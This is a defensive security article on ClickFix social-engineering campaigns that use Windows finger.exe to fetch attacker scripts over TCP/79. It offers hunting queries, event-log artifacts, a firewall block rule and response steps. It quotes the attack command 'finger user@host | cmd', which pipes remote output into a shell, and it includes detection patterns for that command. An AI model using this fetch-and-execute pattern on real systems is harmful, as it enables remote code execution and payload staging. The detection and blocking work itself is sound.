ClickFix pivots to finger.exe: how to spot and stop TCP/79 script fetches
SANS Internet Storm Center reports that current ClickFix campaigns are abusing the built-in Windows finger.exe client to retrieve attacker-hosted scripts over the legacy Finger protocol. The tool isn’t proxy-aware and the destination port is fixed to 79/TCP, which means well-configured explicit egress proxies that block TCP/79 will break this stage. (isc.sans.edu)
Intrusion Flow
- Initial social engineering. ClickFix pages masquerade as “human verification” or problem/solution flows that preload a command into the clipboard and instruct the user to paste and run it. Recent variants add OS detection, countdown timers, and even video instructions to increase compliance. (bleepingcomputer.com)
- Fetch via Finger. In the finger.exe-enabled branch, the lure runs a command that uses Finger to pull a remote command stream and then pipes it into a shell for execution (for example,
finger user@host | cmd). BleepingComputer documented live samples where the finger output is piped to cmd.exe to stage additional tooling. (bleepingcomputer.com) - Payload staging. Observed scripts create working directories, rename built-in utilities (for example, curl.exe) and fetch archives masquerading as benign files, expanding to stealer or RAT payloads. (bleepingcomputer.com)
- Evolution to FileFix. Some crews now avoid terminals entirely, abusing the File Explorer address bar to execute hidden PowerShell (FileFix) as an evolution of the same idea. Expect the Finger fetch step to be swapped for other low-visibility transports over time. (bleepingcomputer.com)
Key Artifacts to Pull
- Process execution
- Windows Security Event ID 4688 with command line (enable “Include command line in process creation events”). Hunt for
finger.exeand any pipeline tocmd.exe/PowerShell. (learn.microsoft.com) - Sysmon Event ID 1 (ProcessCreate) for
C:\Windows\System32\finger.exeand parent lineage (browser → cmd.exe → finger.exe, etc.). (learn.microsoft.com)
- Windows Security Event ID 4688 with command line (enable “Include command line in process creation events”). Hunt for
- Network evidence
- Sysmon Event ID 3 (NetworkConnect) showing outbound TCP connections to remote port 79 with Image
...\finger.exe. (system32.eventsentry.com) - Windows Filtering Platform (WFP) events if “Audit Filtering Platform Connection” is enabled: 5156 (allowed) and 5157 (blocked), which include app path, IPs, and ports. (windows-security.org)
- Host firewall logs (pfirewall*.log) if “log successful connections” and/or “log dropped packets” is enabled. (learn.microsoft.com)
- Sysmon Event ID 3 (NetworkConnect) showing outbound TCP connections to remote port 79 with Image
- Disk artifacts (execution evidence)
- Prefetch:
FINGER.EXE-*.pfunderC:\Windows\Prefetch(run count and up to eight last-run timestamps on Win 8+). (magnetforensics.com) - Amcache:
C:\Windows\AppCompat\Programs\Amcache.hvecan record program presence (and sometimes execution metadata); treat it as corroboration, not sole proof of execution. (securelist.com)
- Prefetch:
Detection Notes
- Microsoft Defender XDR (Advanced Hunting)
- Process creation and network join:
Uses DeviceProcessEvents and DeviceNetworkEvents schemas. (learn.microsoft.com)let lookback = 14d; let finger_execs = DeviceProcessEvents | where Timestamp > ago(lookback) | where FileName =~ "finger.exe"; let finger_net = DeviceNetworkEvents | where Timestamp > ago(lookback) | where RemotePort == 79 and Protocol =~ "Tcp"; finger_execs | project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine, FolderPath, ProcessId | join kind=leftouter ( finger_net | project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessId, InitiatingProcessCommandLine ) on $left.DeviceName == $right.DeviceName and $left.ProcessId == $right.InitiatingProcessId | order by Timestamp desc - Suspicious pipeline usage:
Back this with network to TCP/79 where available. (learn.microsoft.com)DeviceProcessEvents | where Timestamp > ago(14d) | where FileName =~ "cmd.exe" or FileName =~ "powershell.exe" | where ProcessCommandLine has "finger " and ProcessCommandLine contains "|"
- Process creation and network join:
- Windows Eventing/Sysmon
- Enable Security 4688 with command line and Sysmon IDs 1 and 3; filter on Image endswith
\\finger.exeand DestinationPort = 79. (learn.microsoft.com)
- Enable Security 4688 with command line and Sysmon IDs 1 and 3; filter on Image endswith
- Packet capture/NIDS
- Finger is TCP/79; on packet tools, filter
tcp.port == 79. Zeek has historically provided a Finger analyzer, but check your version and plugin set-many deployments will simply rely on conn.log for port 79 traffic. (iana.org)
- Finger is TCP/79; on packet tools, filter
Response Guidance
- Contain egress on TCP/79
- The attacking step depends on direct TCP/79 to the Internet. Block 79/TCP egress from user segments at your perimeter and host firewalls. This aligns with baseline control guidance to default-deny outbound on endpoints and only allow required services. (isc.sans.edu)
- Example (local host firewall, admin CMD):
Or deploy an outbound port rule via GPO/MDM at scale. (learn.microsoft.com)
netsh advfirewall firewall add rule name="Block TCP79 Outbound" dir=out action=block protocol=TCP remoteport=79
- Proxy design
- finger.exe is not proxy-aware; in environments with explicit proxies and default-deny egress, the fetch will fail. In transparent proxy setups, ensure port 79 is denied outbound. (isc.sans.edu)
- Endpoint hardening
- Where feasible, block or tightly scope finger.exe via AppLocker/WDAC policy (publisher/path/hash rule), while monitoring for operational impact. (learn.microsoft.com)
- Host triage
- Isolate the system; collect Security 4688, WFP 5156/5157, Sysmon 1/3, Prefetch, Amcache, and firewall logs. Review the parent chain that launched finger.exe and any subsequent curl/PowerShell activity to determine secondary payloads. (learn.microsoft.com)
- User comms
- Re-educate on ClickFix patterns: fake Cloudflare checks, clipboard-injected commands, “Win+R → Ctrl+V → Enter,” and the Explorer address-bar variant (FileFix). (securityweek.com)
Takeaways
- Add hunts and detections for finger.exe execution and outbound TCP/79 connections; block TCP/79 egress broadly. (isc.sans.edu)
- Treat any
finger ... | cmd/PowerShell pipeline as high-signal and pivot to payload retrieval and persistence checks. (bleepingcomputer.com) - Reinforce application control and user training to blunt evolving ClickFix/FileFix social-engineering chains. (bleepingcomputer.com)